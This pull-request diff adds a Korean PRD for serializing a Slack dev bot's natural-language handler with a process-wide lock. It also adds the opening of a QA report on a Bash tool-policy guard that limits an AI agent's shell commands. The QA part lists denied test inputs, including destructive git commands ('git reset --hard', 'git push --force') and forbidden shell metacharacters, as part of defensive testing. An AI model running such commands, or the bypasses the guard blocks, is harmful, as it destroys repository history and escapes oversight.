### PR TITLE
docs(prd): dev-relay-nl-serialize — NL 분기 process-wide 직렬화 PRD

### DIFF
--- a/docs/prd/dev-relay-nl-serialize.md
+++ b/docs/prd/dev-relay-nl-serialize.md
@@ -1,0 +1,272 @@
+# PRD: Dev Manager — 자연어 분기 process-wide 직렬화
+
+- **slug**: `dev-relay-nl-serialize`
+- **PM**: 이하영 (hayoung.lee2@musinsa.com, Slack `U0AE7A54NHL`)
+- **작성일**: 2026-05-07
+- **UI 포함 여부**: **No** (외부 노출은 NL 분기 거절 안내 1줄만 — 상위 PRD `slack-dev-relay.md` / `dev-relay-natural-language.md` 와 동일 정책. 별도 웹/네이티브 UI 없음.)
+- **상위 PRD**: [`docs/prd/dev-relay-natural-language.md`](./dev-relay-natural-language.md) (NL 분기 — 본 PRD 직렬화 대상)
+- **인접 PRD**: [`docs/prd/slack-dev-relay.md`](./slack-dev-relay.md), [`docs/prd/dev-relay-agent-integration.md`](./dev-relay-agent-integration.md)
+- **관련 이슈/PR**: PR #43 (structured 분기 직렬화 — 본 PRD 의 사촌 작업)
+- **대상 파일**: `ai/dev_relay/main.py:417-509` (`_handle_natural_language`)
+
+---
+
+## 1. 배경 / 문제
+
+선행 PRD [`dev-relay-natural-language.md`](./dev-relay-natural-language.md) 에서 도입한 NL 분기 (`_handle_natural_language`, [`ai/dev_relay/main.py:417-509`](../../ai/dev_relay/main.py)) 는 Slack Bolt 이벤트 핸들러의 threaded executor 위에서 **직접 동시 실행** 된다. structured 분기(`status`, `review pr <N>`, `merge pr <N>`) 는 PR #43 으로 `JobQueue` + `AgentRunner` (`max_workers=1`) 직렬화가 완료됐지만, NL 분기는 그 경로 밖에 있어 직렬화 대상이 아니다.
+
+코드 검토(2026-05-06) 로 확인된 race 4건:
+
+1. **같은 thread_ts 동시 NL 메시지 — read-then-write race**. `existing = sessions.get(thread_ts, channel_id)` (`main.py:438`) 과 `sessions.start(...)` (`main.py:469`) 사이에 SDK 호출 (수 초) 이 들어간다. 같은 스레드에 두 메시지가 거의 동시에 도착하면 두 핸들러가 모두 `existing=None` 또는 같은 `existing.session_id` 를 읽고 → SDK 호출 (병렬) → `sessions.start(...)` 두 번 호출 → 한쪽 SDK `session_id` 가 덮어쓰임, `turn_count` 리셋, 컨텍스트 손실.
+2. **응답 발사 순서 보장 안 됨**. 늦게 시작한 SDK 호출이 먼저 끝나면 `say(safe, thread_ts=thread_ts)` 가 거꾸로 발사 — 사용자 입장에서 두 번째 질문에 대한 답이 먼저 오고 첫 번째 답이 나중에 오는 UX 깨짐.
+3. **audit.jsonl interleaving 잠재성**. `_append_audit` 는 락 없이 `f.write` 만 호출. 단일 line write 는 OS 레벨에서 보통 atomic 이지만, 동시 핸들러가 늘어날수록 잠재 회귀 표면이 커진다.
+4. **SDK quota / API 호출 동시 발생**. 사용자가 빠르게 메시지를 연속 보내면 SDK 가 동시 세션 호출을 받는데, 비용·rate limit 측면에서 의도치 않은 폭증 가능.
+
+structured 분기는 PR #43 으로 단일 worker 큐를 통과하므로 위 4건이 발생할 수 없다. NL 분기만 잔존하는 상태이며, 본 PRD 가 이를 닫는다.
+
+### 1.1 옵션 비교 (사용자 결정 = C)
+
+| 옵션 | 내용 | 장점 | 단점 |
+|---|---|---|---|
+| A | NL 분기를 `JobQueue` 에 통합 (별도 NL worker 분리) | 일관성 높음. 큐 관측성·shutdown 흐름 통합 | 코드 복잡도 큼. NL 응답이 여러 메시지를 차례로 발사하는 흐름이 worker 모델과 매끄럽지 않음. 1인 MVP 단계 비용 과다 |
+| B | `thread_ts` 별 lock map (per-thread mutex) | 다른 스레드끼리는 병렬 가능 → UX 응답성 좋음 | 락 맵 lifecycle 비용 (만료·GC). 1인 MVP 단계 다중 스레드 동시성 이득 작음. 다중 사용자 시점에 어차피 재설계 |
+| **C** | **process-wide `threading.Lock` 1개** | structured (`max_workers=1`) 와 정책 통일. 락 1개로 단순. 테스트·관측 쉬움. 1인 MVP 단계 충분 | NL 동시 처리 불가 — busy 시 즉시 거절 UX 가 필요 |
+
+사용자(이하영) 가 옵션 **C** 를 선택. 근거: 1인 MVP 단계라 동시 NL 처리 능력보다 race 차단과 코드 단순성이 우선. 다중 사용자 시점에는 옵션 A 또는 B 로 재설계 예정 — 본 PRD 비범위.
+
+UX 보정: NL turn 진행 중에 새 NL 메시지가 도달하면 **즉시 안내 + 거절** (큐 적재 안 함). 사용자는 잠시 후 재시도하면 되며, 대기 큐가 없으니 응답 지연 누적도 없다.
+
+---
+
+## 2. 봇 네이밍 / 컴플라이언스 제약 재확인
+
+상위 PRD `slack-dev-relay.md` §1 ("외부 노출 텍스트 네이밍 제약") 정책을 그대로 승계한다. 본 PRD 는 새 봇·새 표시명·새 채널 라벨을 도입하지 않는다. 다만 본 PRD 에서 새로 도입되는 식별자·메시지·audit kind 는 모두 컴플라이언스 가드 통과 대상이다.
+
+- 정책 단일 정의 지점: [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS` 그대로 재사용 (별도 키워드 셋 신설 금지).
+- 본 PRD 본문에서도 봇을 통칭할 때는 "Dev Manager 봇" 으로 부른다.
+- 신규 안내 메시지(`TEMPLATE_NL_BUSY`) 본문 예시: "지금 다른 요청을 처리 중이에요. 잠시 후 다시 보내주세요." — 외부 노출 텍스트로서 컴플라이언스 가드 0 hit 통과 필수.
+- 신규 audit kind `nl_busy_rejected` 식별자 자체도 본 PRD 본문·코드·테스트에서 0 hit 유지.
+- 본 PRD 본문 자체에 [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS` 의 어떤 키워드도 등장하지 않도록 0 hit 유지 (구체 키워드 목록은 코드 단일 정의 지점만 참조 — PRD 본문에는 인라인 나열 금지).
+
+---
+
+## 3. 범위 (In Scope)
+
+본 PRD 는 NL 분기 (`_handle_natural_language`) 의 **process-wide 단일 mutex 직렬화** 에 한정한다.
+
+### 3.1 메커니즘 — `threading.Lock` 단일 인스턴스
+
+- 모듈 스코프 (`ai/dev_relay/main.py`) 또는 `build_app` 컨테이너에 `threading.Lock` 인스턴스 **1개** 를 생성. 이름 예: `_nl_turn_lock` (식별자 자체도 컴플라이언스 0 hit).
+- `_handle_natural_language` 진입 직후 `_nl_turn_lock.acquire(blocking=False)` 시도.
+  - **acquire 성공**: 현행 흐름 그대로 진행 (existing 조회 → SDK 호출 → session 갱신 → 메시지 발사). 함수 종료 시점(정상·예외 모두) 에 `release()` 보장 — `try/finally` 또는 context manager.
+  - **acquire 실패 (이미 누가 락 보유 중)**: 즉시 `TEMPLATE_NL_BUSY` 안내 메시지를 `say(..., thread_ts=thread_ts)` 로 발사하고 함수 즉시 반환. SDK 호출·session 갱신·후속 audit 라인 모두 발생하지 않음. (단, `nl_busy_rejected` audit 라인 1줄은 기록 — §3.4 참조.)
+- `blocking=False` 선택 근거: 사용자 결정(§1.1) 대로 큐 적재 없이 즉시 거절. `blocking=True` 로 대기시키면 Slack Bolt executor 스레드를 계속 점유해 worker pool 고갈 + 응답 지연 누적 → UX 악화.
+
+### 3.2 busy 시 정책 — 즉시 안내 + 거절
+
+- busy 발생 시 사용자에게 정확히 1개 메시지 (`TEMPLATE_NL_BUSY`) 를 발사. 추가 응답·메시지 chunk 없음.
+- 메시지는 **요청이 도착한 thread_ts** 에 묶어 발사. (기존 NL 응답 정책과 동일 — `main.py:506-509` 의 `say(safe, thread_ts=thread_ts)` 정책 승계.)
+- 메시지 본문 예: "지금 다른 요청을 처리 중이에요. 잠시 후 다시 보내주세요." — 정확한 문구는 구현 단계에서 컴플라이언스 가드 통과를 보장하며 결정. 본 PRD 는 "도메인 키워드 0 hit" "20~60자 한국어 1줄" 만 명시.
+- 발사 직전 `guard_text_with_urls` 또는 `safe_say` 동급 가드를 거쳐 컴플라이언스 0 hit 검증 (이중 layer). 가드 위반이면 fallback 으로 무발사 + 에러 로그 (외부 노출 사고 절대 금지).
+- NL 큐 미도입 — 거절된 메시지는 어디에도 적재되지 않는다. 사용자가 잠시 후 재전송해야 한다 (PM 권고 옵션 1).
+
+### 3.3 structured ↔ NL 상호 직렬화 — 비범위 (별도 락)
+
+- structured 분기는 PR #43 의 `JobQueue` + `AgentRunner(max_workers=1)` 가 직렬화. NL 분기는 본 PRD 의 `_nl_turn_lock` 가 직렬화. **두 락은 독립** — structured 진행 중 NL 진입은 차단되지 않으며, 그 반대도 동일.
+- 근거: (a) structured 와 NL 의 race 표면이 다르다 (structured 는 PR/이슈 외부 액션, NL 은 SDK session 매핑). (b) 두 분기 동시 진행이 일으키는 race 사례는 코드 검토상 발견되지 않음. (c) 통합 직렬화는 옵션 A 와 같아 코드 복잡도 폭증.
+- 따라서 AC-NLS-4 (structured 진행 중 NL — 회귀) 는 **NL 가 정상 처리됨** 이 기대 동작이다. 본 PRD 는 두 분기 상호 차단을 의도하지 않는다.
+
+### 3.4 audit kind 신규 — `nl_busy_rejected`
+
+busy 거절이 발생한 경우, audit.jsonl 에 다음 1줄 record 를 append.
+
+```json
+{"ts": "<ISO-KST>", "kind": "nl_busy_rejected", "thread_ts": "<thread_ts>", "user_id_masked": "<masked>"}
+```
+
+- `kind` 식별자는 컴플라이언스 가드 0 hit. (`busy`, `rejected`, `nl` 모두 도메인 키워드 아님 — 가드 통과 확인 필수.)
+- `_append_audit` 헬퍼 그대로 사용 — 별도 직렬화 기법 도입 없음.
+- 사용 목적: (a) busy 발생 빈도 모니터링. (b) 후속 PRD (다중 사용자·옵션 A/B 재설계) 의 입력 데이터.
+
+### 3.5 shutdown 보호
+
+데몬 shutdown (`SIGTERM` / `SIGINT` / `AgentRunner.shutdown(timeout)` 호출) 시점에 NL turn 이 진행 중이면 다음을 보장한다.
+
+- **진행 중 1건 graceful 종료**: 락을 보유한 NL turn 은 SDK 호출 완료 + 응답 발사 + session 갱신 + audit 기록까지 완수한 뒤 락을 release.
+- **새 진입 거절**: shutdown flag (모듈/컨테이너 스코프 `threading.Event` 또는 동급) 가 set 된 이후 `_handle_natural_language` 진입은 락 acquire 시도 이전에 즉시 거절 (`TEMPLATE_NL_BUSY` 또는 별도 shutdown notice — 본 PRD 는 동일 메시지 재사용을 기본으로 한다. 사용자 결정 변경 시 §10 갱신).
+- shutdown timeout 내에 진행 중 turn 이 끝나지 않으면 watchdog 이 강제 종료 (PR #37 의 `AgentRunner.shutdown(timeout)` watchdog 정책 그대로). 본 PRD 는 watchdog 자체를 새로 정의하지 않음 — 기존 메커니즘 재사용.
+
+### 3.6 외부 인터페이스·운영 영향
+
+- `_handle_natural_language` 의 외부 시그니처 변경 없음. 호출 측(`build_app` 의 Slack Bolt 핸들러 등록부) 에 lock 인스턴스 주입 1곳만 추가.
+- `say` 호출 정책·`thread_ts` 처리·기존 audit kind 변경 없음.
+- `JobQueue` / `AgentRunner` 변경 없음.
+- 신규 의존성 없음 — `threading` 표준 라이브러리.
+
+---
+
+## 4. 비범위 (Out of Scope)
+
+- **옵션 B (thread_ts 별 lock map)** — 본 PRD 는 process-wide 단일 락만. per-thread 동시성은 다중 사용자 시점 후속 PRD 에서.
+- **NL 메시지 큐 / 대기 적재** — busy 시 즉시 거절 정책. 큐 적재·재시도·예약은 도입하지 않음.
+- **structured ↔ NL 상호 직렬화** — §3.3 근거대로 비범위.
+- **SDK quota / rate limit 진단·튜닝** — `_RateLimiter` (5초/3건) 는 그대로. 본 PRD 는 race 차단만.
+- **multi-process 데몬 직렬화** — `threading.Lock` 은 단일 process 내에서만 유효. 멀티 프로세스 / 멀티 인스턴스 데몬 배치는 본 PRD 비범위.
+- **shutdown watchdog 자체 재정의** — PR #37 의 `AgentRunner.shutdown(timeout)` watchdog 그대로 재사용. 본 PRD 는 NL 분기 진입 거절 가드만 추가.
+- **busy 안내 메시지 다국어화 / 풍부한 안내** — 한국어 1줄, 컴플라이언스 가드 통과 본문 1종만. 다국어·도움말 링크·재시도 시각 안내는 비범위.
+- **NL 분기 외 경로 race 점검** — `dev-relay-agent-integration.md` 의 reviewer/devops 호출 경로는 PR #43 으로 직렬화 완료. 본 PRD 와 독립.
+
+---
+
+## 5. 수용 기준 (Acceptance Criteria)
+
+검증은 단위 테스트 + 통합 테스트로 자동화한다. 각 AC 는 §8 에서 테스트 매핑.
+
+### AC-NLS-1. 같은 thread_ts 동시 두 NL — 두 번째 거절
+
+- **재현**: 같은 `thread_ts` + `channel_id` 로 두 NL 이벤트를 거의 동시에 (sub-100ms 간격) `_handle_natural_language` 에 주입. SDK 호출은 mock 으로 1초 지연.
+- **기대**:
+  - 첫 번째 호출: `_nl_turn_lock` acquire 성공 → SDK 호출 1건 발생 → 정상 응답 발사.
+  - 두 번째 호출: acquire 실패 → `TEMPLATE_NL_BUSY` 1줄 발사 → SDK 호출 0건. `sessions.start` / `sessions.resume` 호출 0건.
+  - 전체 SDK 호출 횟수 = 1.
+  - audit.jsonl 에 `nl_busy_rejected` 1줄 + 정상 turn 의 `llm_invoked` 등 기존 라인 정상 기록.
+
+### AC-NLS-2. 다른 thread_ts 동시 두 NL — 두 번째 거절 (process-wide)
+
+- **재현**: 서로 다른 `thread_ts` 로 두 NL 이벤트를 거의 동시에 주입.
+- **기대**: AC-NLS-1 과 동일 — process-wide 락이므로 다른 스레드라도 두 번째는 거절. SDK 호출 1건.
+- 사용자(이하영) 가 옵션 C 를 선택한 시점에 이 동작에 동의함을 §1.1 에서 명시. 옵션 B 로 재설계 시 본 AC 가 변경된다.
+
+### AC-NLS-3. turn 종료 후 새 NL 정상 처리
+
+- **재현**: NL turn 1건이 정상 종료 (락 release) 된 후, 새 NL 이벤트 주입.
+- **기대**: 두 번째 NL 도 acquire 성공 → SDK 호출 1건 → 정상 응답. busy 거절 안 됨.
+
+### AC-NLS-4. structured 진행 중 NL — 회귀 (별도 경로)
+
+- **재현**: `JobQueue` 에 적재된 structured 명령 (`review pr <N>`) 이 `AgentRunner` 에서 실행 중인 시점에 NL 이벤트 주입. structured 는 mock 으로 5초 지연.
+- **기대**: NL 이 즉시 처리됨 (락 미충돌, §3.3 정책). SDK 호출 정상 발사. busy 거절 안 됨.
+
+### AC-NLS-5. rate_limiter 협업 — rate limit 우선 도달 시 NL busy 미발사
+
+- **재현**: 사용자 NL 이 5초 내 4번째 도달 (`_RateLimiter` 5초/3건 초과). 락은 비어 있음.
+- **기대**: rate_limiter 가 먼저 발동해 rate limit 안내 메시지 발사. `TEMPLATE_NL_BUSY` 미발사. `nl_busy_rejected` audit 미기록. 즉, **rate limit 가드와 lock 가드가 중복으로 발사되지 않는다.** rate limit 가드가 먼저 적용되도록 호출 순서 보장.
+
+### AC-NLS-6. audit `nl_busy_rejected` 1줄 기록
+
+- **재현**: AC-NLS-1 또는 AC-NLS-2 시나리오에서 거절 1건 발생.
+- **기대**: audit.jsonl 에 `kind="nl_busy_rejected"` line 정확히 1줄 추가. 필드: `ts`, `kind`, `thread_ts`, `user_id_masked`. 추가 필드 0개 (스키마 일관성).
+
+### AC-NLS-7. 컴플라이언스 정적 검사
+
+- **재현**: `_compliance.py` 의 `FORBIDDEN_KEYWORDS` 셋을 패턴으로 사용해 다음을 정적 스캔 — 본 PRD 본문, `ai/dev_relay/main.py` diff, `ai/tests/dev_relay/` 신규/변경 케이스, 신규 메시지 상수 (`TEMPLATE_NL_BUSY`), 신규 audit kind 식별자(`nl_busy_rejected`), 관련 PR 제목·본문, 커밋 메시지.
+- **기대**: 0 hit. 기존 `ai/tests/dev_relay/test_compliance.py` 의 정적 검사가 신규 변경을 자동 커버하는지 확인 (개별 파일 화이트리스트 누락 시 보강).
+
+### AC-NLS-8. 회귀 — 기존 NL + structured 테스트 0 fail
+
+- **재현**: 기존 `ai/tests/dev_relay/test_handle_command_nl.py` (있으면), `test_agent_integration.py`, `test_dispatcher.py`, `test_tool_policy.py` 모든 케이스 실행.
+- **기대**: 0 fail. 본 PRD 변경이 기존 단일 NL 흐름 / structured 흐름에 회귀를 일으키지 않음.
+
+### AC-NLS-9. shutdown — 진행 중 1건 graceful, 새 진입 거절
+
+- **재현**:
+  - (a) NL turn 진행 중 (SDK mock 2초 지연) shutdown flag set → 진행 중 turn 은 응답 발사·세션 갱신·audit 기록 완료 후 락 release.
+  - (b) shutdown flag set 이후 새 NL 이벤트 주입 → 즉시 거절 + busy 안내 (또는 본 PRD §3.5 에 정의된 동일 메시지). SDK 호출 0건, 세션 갱신 0건.
+
+---
+
+## 6. 가정 · 제약
+
+### 6.1 기술
+
+- Python 3.11+, `threading` 표준 라이브러리. 신규 의존성 없음.
+- 변경 영향 범위는 `ai/dev_relay/main.py` 의 `_handle_natural_language` + `build_app` 의 lock 인스턴스 주입 부 + 신규 메시지 상수 1곳. 호출 측 (Slack Bolt 핸들러 등록부) 외 다른 모듈 변경 없음.
+- `threading.Lock` 은 단일 process 한정. 멀티 프로세스 데몬 배치 시 본 직렬화는 무효 — §4 비범위.
+- Slack Bolt 의 threaded executor 는 default 다중 worker. 본 PRD 가 도입하는 `_nl_turn_lock` 이 그 위에 단일 직렬화 layer 를 얹는다.
+
+### 6.2 보안 / 컴플라이언스
+
+- 본 PRD 는 외부 노출 텍스트 1종 (`TEMPLATE_NL_BUSY`) 을 신규 도입한다. 컴플라이언스 가드 0 hit 통과를 AC-NLS-7 으로 검증.
+- 신규 audit kind 식별자(`nl_busy_rejected`) 는 외부 노출이 아니지만, 본 PRD 본문·코드·테스트 모두에서 가드 0 hit 유지를 동일 AC 로 검증.
+- 락 보유 중 예외 발생 시 `try/finally` 로 release 보장. 미release 회귀가 발생하면 데몬 전체 NL 분기가 영구 차단되므로 보수적으로 finally 절 필수 — 코드 리뷰 게이트 포인트로 명시.
+
+### 6.3 일정 / 운영
+
+- 로컬 데몬 코드 한정. CI / 배포 / 인프라 변경 없음.
+- 로컬 audit.jsonl 형식은 신규 kind 1종 추가 — 분석 스크립트가 unknown kind 를 무시하면 호환. 새 분석 스크립트는 `nl_busy_rejected` 를 인지해 빈도 보고에 포함할 수 있다 (선택, 본 PRD 비범위).
+- 머지 후 1~2주간 `nl_busy_rejected` 발생 빈도를 사용자(이하영) 본인이 가볍게 모니터링 — 빈도가 높으면 옵션 A/B 재설계 우선순위 상향.
+
+### 6.4 비용
+
+- SDK 토큰 비용 영향 없음 (busy 거절은 SDK 호출 전 차단). 오히려 동시 SDK 호출 가능성을 0 으로 만들어 비용 폭증 위험을 줄인다.
+- `threading.Lock` 자체 비용은 무시 가능 (μs 단위 acquire/release).
+
+---
+
+## 7. 위험 / 의존
+
+1. **락 미release 회귀** — `_handle_natural_language` 내부에서 예외 발생 시 락이 release 되지 않으면 데몬의 NL 분기 전체가 영구 차단된다. 1차 방어는 `try/finally` 또는 context manager 강제. 2차 방어는 단위 테스트에 "예외 발생 → 락 release 검증" 케이스 포함 (AC-NLS-3 의 변형 — `run_turn` 이 raise 하는 시나리오).
+2. **rate_limiter 와 lock 가드 발사 중복** — 호출 순서가 잘못되면 rate limit 안내 + busy 안내 둘 다 발사될 수 있다. AC-NLS-5 로 명시 검증. 권장 순서: rate_limiter → lock acquire → SDK.
+3. **shutdown 흐름과 락 release 경쟁** — shutdown flag 가 set 되는 시점과 진행 중 turn 의 락 release 가 경쟁할 수 있다. AC-NLS-9 (a) 로 graceful 종료를 명시 검증. watchdog timeout (PR #37) 보다 짧은 시간 내 turn 종료가 정상 케이스, 초과 시 강제 종료는 watchdog 책임.
+4. **busy 메시지 자체가 race 를 유발하는 경우** — `say(TEMPLATE_NL_BUSY, thread_ts=...)` 가 외부 API 호출인데, 거절 빈도가 높으면 Slack rate limit 표면이 늘어난다. 1인 MVP 단계에서는 무시 가능. 다중 사용자 시점에는 옵션 B 로 재설계되어야 함.
+5. **`_append_audit` 자체 락 부재** — 본 PRD 가 NL 분기 직렬화로 동시 audit 기록 가능성을 줄여주지만, structured 분기와 동시 audit 기록은 여전히 가능. 단일 line write 가 보통 atomic 이므로 본 PRD 비범위 — 별도 PRD 에서 `_append_audit` 자체에 `threading.Lock` 추가가 필요하면 후속 작업.
+6. **multi-process 데몬 배치 시 무효** — 본 PRD 의 `threading.Lock` 은 process-local. 운영자가 데몬을 멀티 인스턴스로 배치하면 직렬화가 무효화된다. 현재 운영은 단일 인스턴스이며, 멀티 인스턴스 배치는 §4 비범위. 운영 가이드(`docs/HANDOFF.md` 또는 `README.md`) 에 "본 데몬은 단일 인스턴스 전제" 한 줄 추가 권장 (구현 단계 선택).
+
+---
+
+## 8. 테스트 전략 개요
+
+QA 가 본 PRD AC 를 검증하기 위한 1차 가이드. 정확한 테스트 항목은 QA 산출물(`docs/qa/dev-relay-nl-serialize.md`) 이 주도한다.
+
+### 8.1 자동 (단위 / 통합)
+
+- **신규 테스트 클래스** (`ai/tests/dev_relay/test_handle_command_nl_serialize.py` 신규 또는 `test_handle_command_nl.py` 확장):
+  - `TestNLSerializeSameThread` — AC-NLS-1
+  - `TestNLSerializeDifferentThread` — AC-NLS-2
+  - `TestNLSerializeSequential` — AC-NLS-3 (정상 종료 후 재진입)
+  - `TestNLSerializeStructuredCoexist` — AC-NLS-4 (별도 락 검증)
+  - `TestNLSerializeRateLimitInterop` — AC-NLS-5 (rate_limiter 우선)
+  - `TestNLSerializeAudit` — AC-NLS-6 (audit kind 1줄)
+  - `TestNLSerializeShutdown` — AC-NLS-9 (graceful + 새 진입 거절)
+  - `TestNLSerializeLockReleaseOnException` — §7 위험 1번 (예외 시 락 release)
+- **mock 전략**: `run_turn` 을 `time.sleep` mock 으로 감싸 SDK 호출 지연 시뮬. `threading.Thread` 2개로 동시 진입 재현. `_append_audit` 는 in-memory list 캡처 mock.
+- **회귀**: 기존 `ai/tests/dev_relay/test_handle_command_nl.py`, `test_agent_integration.py`, `test_dispatcher.py`, `test_tool_policy.py` 모든 parametrize 케이스 0 fail (AC-NLS-8).
+- **컴플라이언스 정적 검사**: `test_compliance.py` 의 파일 스캔 화이트리스트에 본 PRD 산출물(`docs/prd/dev-relay-nl-serialize.md`) + 신규 메시지 상수 + 신규 audit kind 포함 확인 (AC-NLS-7).
+
+### 8.2 수동 (사용자 검증)
+
+상위 PRD 부록 A 셋업이 완료된 환경에서 모바일 Slack 앱에서 다음 한 사이클을 1회 수행:
+
+- 같은 스레드에 자연어 메시지 2개를 빠르게 (1~2초 간격) 연속 전송 → 첫 번째는 정상 응답, 두 번째는 즉시 busy 안내 1줄 수신.
+- 첫 번째 응답 완료를 기다린 후 같은 스레드에 새 자연어 전송 → 정상 응답 (회귀 확인).
+- structured 명령 (`review pr <N>`) 진행 중에 새 스레드에서 자연어 전송 → 자연어가 즉시 처리됨 (별도 락 확인).
+
+---
+
+## 9. 참고
+
+- 상위 PRD: [`docs/prd/dev-relay-natural-language.md`](./dev-relay-natural-language.md)
+- 인접 PRD: [`docs/prd/slack-dev-relay.md`](./slack-dev-relay.md), [`docs/prd/dev-relay-agent-integration.md`](./dev-relay-agent-integration.md)
+- 사촌 PR: PR #43 (structured 분기 직렬화), PR #37 (`AgentRunner.shutdown(timeout)` watchdog)
+- 변경 대상 코드: [`ai/dev_relay/main.py`](../../ai/dev_relay/main.py) `_handle_natural_language` (라인 417-509)
+- 테스트 패턴 참조: [`ai/tests/dev_relay/test_handle_command_nl.py`](../../ai/tests/dev_relay/test_handle_command_nl.py) (있으면), [`ai/tests/dev_relay/test_agent_integration.py`](../../ai/tests/dev_relay/test_agent_integration.py)
+- 정책 단일 정의 지점: [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS`
+- `AGENTS.md` — PRD 양식, 라벨 플로우, 컴플라이언스 원칙
+
+---
+
+## 10. PM 결정사항 요약 (구현·QA 가 한눈에 보도록)
+
+| 항목 | 결정 |
+|---|---|
+| 본 PRD 책임 범위 | NL 분기 (`_handle_natural_language`) 의 process-wide 단일 mutex 직렬화 |
+| 메커니즘 | `threading.Lock` 1개, `acquire(blocking=False)` 패턴, `try/finally` release 강제 |
+| busy 시 정책 | 즉시 `TEMPLATE_NL_BUSY` 안내 1줄 발사 + 거절. NL 큐 미도입 (PM 권고 옵션 1) |
+| structured ↔ NL 상호 직렬화 | **비범위** — 별도 락이라 동시 진행 가능 (AC-NLS-4) |
+| 신규 audit kind | `nl_busy_rejected` 1줄. 필드: `ts`, `kind`, `thread_ts`, `user_id_masked` |
+| 신규 메시지 상수 | `TEMPLATE_NL_BUSY` — 한국어 1줄, 컴플라이언스 0 hit |
+| rate_limiter 와의 상호작용 | rate_limiter 가 먼저 적용. lock 가드는 그 다음. busy 안내 중복 발사 금지 (AC-NLS-5) |
+| shutdown 보호 | 진행 중 1건 graceful 종료, 새 진입 거절. watchdog 자체는 PR #37 재사용 |
+| 외부 인터페이스 변경 | **없음** — `_handle_natural_language` 시그니처·`JobQueue`·`AgentRunner`·기존 audit kind 모두 그대로 |
+| 운영 모니터링 | 머지 후 1~2주간 `nl_busy_rejected` 발생 빈도 사용자 본인 모니터링 → 후속 옵션 A/B 재설계 입력 |
+| 다중 사용자 / 멀티 인스턴스 | 본 PRD 비범위. `threading.Lock` 은 단일 process 한정 |

--- a/docs/qa/dev-relay-shell-pipe-allow.md
+++ b/docs/qa/dev-relay-shell-pipe-allow.md
@@ -1,0 +1,272 @@
+# QA: dev-relay-shell-pipe-allow
+
+> 작성자: QA (자동 검증 + 정적 검사 — 수동 검증 별도 가이드)
+> 작성일: 2026-05-07
+> 입력 PRD: [`docs/prd/dev-relay-shell-pipe-allow.md`](../prd/dev-relay-shell-pipe-allow.md)
+> 검증 대상 PR: [#45](https://github.com/deeptrading-lab/trading-signal-engine/pull/45) (`feature/dev-relay-shell-pipe-allow`)
+> 변경 규모: +299 / -7, 3 files, 2 commits (`895a02b` 구현 + `d1f20d5` 테스트)
+> 회귀 (전체): `python3 -m pytest ai/tests/` → **654 passed (1.39s, 0 failed)**
+> 회귀 (dev_relay 한정): `python3 -m pytest ai/tests/dev_relay/` → **480 passed (1.14s, 0 failed)**
+> 회귀 (tool_policy 한정): `python3 -m pytest ai/tests/dev_relay/test_tool_policy.py` → **128 passed (0.33s, 0 failed)**
+
+---
+
+## 0. 요약
+
+- **자동 검증 통과**: AC-PIPE-1 ~ AC-PIPE-9 9건 모두 PASS — pipe 양쪽 RO 허용 / 우회 13종 거부 / 회귀 0건 / segment 상한 / 빈 segment / destructive 1차 차단 / 잔존 metachar 거부 / 컴플라이언스 정적 스캔 / NL hook 통합 시나리오 모두 단위 테스트로 검증됨.
+- **외부 인터페이스 변경 0건 확인** (PRD §3.6) — `evaluate(tool_name, tool_input) -> ToolDecision` 시그니처, `ToolDecision` 필드 (`allowed`, `reason`, `brief`), `ALLOWED_TOOLS={Bash,Glob,Grep,Read,WebFetch}` / `DENIED_TOOLS={Edit,NotebookEdit,Write}`, audit kind, `_FORBIDDEN_SHELL_METACHARS` 7종 모두 그대로. 신규 reason 식별자 0건.
+- **모듈 상수 노출 확인**: `_MAX_PIPE_SEGMENTS = 5`, `_FORBIDDEN_NON_PIPE_METACHARS = ('>', '>>', '<', '&', ';', '`', '$(')` (`|` 제외) 모두 import 가능 — PRD §3.4 만족.
+- **자동 검증 항목 매핑**:
+  - AC-PIPE-1: `test_tool_policy.py::TestBashPipeAllowed::test_pipe_readonly_allowed` (12 parametrize)
+  - AC-PIPE-2: `test_tool_policy.py::TestBashPipeBypassDenied::test_bypass_denied` (13 parametrize)
+  - AC-PIPE-3: `TestBashReadOnlyAllowed`, `TestBashMutatingDenied`, `TestBashDestructiveDenied` (기존 모든 케이스 0 fail)
+  - AC-PIPE-4: `TestBashPipeBoundary::test_five_segments_allowed`, `test_six_segments_rejected`
+  - AC-PIPE-5: `TestBashPipeBoundary::test_leading_pipe_empty_segment`, `test_trailing_pipe_empty_segment`, `test_double_pipe_empty_segment`, `test_unclosed_quote_parse_error`, `test_quoted_pipe_treated_as_single_token`
+  - AC-PIPE-6: `TestBashDestructiveDenied::test_destructive_patterns_denied[git reset --hard HEAD~5 | echo ok]`, `[git push --force | cat]`, `TestNLPipeHookIntegration::test_sdk_destructive_pipe_call_blocked`
+  - AC-PIPE-7: `TestBashPipeBoundary::test_other_metachars_residual_denied` (3 parametrize)
+  - AC-PIPE-8: `test_compliance.py::test_prd_shell_pipe_allow_body_outside_code_is_clean`, `test_dev_relay_source_clean[tool_policy.py]`, 추가 정적 검증 (PR #45 commits / PR title-body / test 신규 케이스 0 hit)
+  - AC-PIPE-9: `TestNLPipeHookIntegration::test_sdk_pipe_call_passes_guard`, `test_sdk_audit_pipe_call_passes_guard`, `test_sdk_destructive_pipe_call_blocked`
+- **수동 검증 (PRD §8.2)**: 모바일 Slack 환경 부재 — 본 세션에서 미수행. 후속 세션에서 사용자가 직접 1 사이클 (NL 입력 → SDK 가 pipe 명령 시도 → 가드 통과 → 응답) 검증 권장. PRD §8.2 가이드 그대로 진행 가능 — 모든 자동 가드(`_evaluate_bash`, `_evaluate_pipe_segments`, `is_destructive`)·정적 스캔이 통과한 상태이므로 수동 1 사이클로 충분.
+- **회귀 0건**. 도메인 키워드 평문 누출 0건 (PRD 본문·tool_policy.py·신규 테스트 케이스·PR 제목·PR 본문·PR #45 commits 모두 정적 스캔 통과; `test_compliance.py` 자체에 등장하는 키워드는 본 파일 docstring 명시대로 의도적 fixture, 컴플라이언스 dev_relay 소스 스캔 대상에서 제외).
+- **최종 판정**: `qa-passed` — AC 9/9 통과.
+
+---
+
+## 1. PRD 수용 기준 검증
+
+### AC-PIPE-1. 양쪽 RO `|` 명령 허용 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
